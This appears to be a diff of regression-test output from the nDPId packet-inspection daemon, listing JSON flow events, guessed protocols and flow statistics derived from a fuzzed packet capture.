-00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00679{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Cloudflare","breed":"Acceptable","category":"Web"},"http": {}} +00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1031854488666,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5827,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 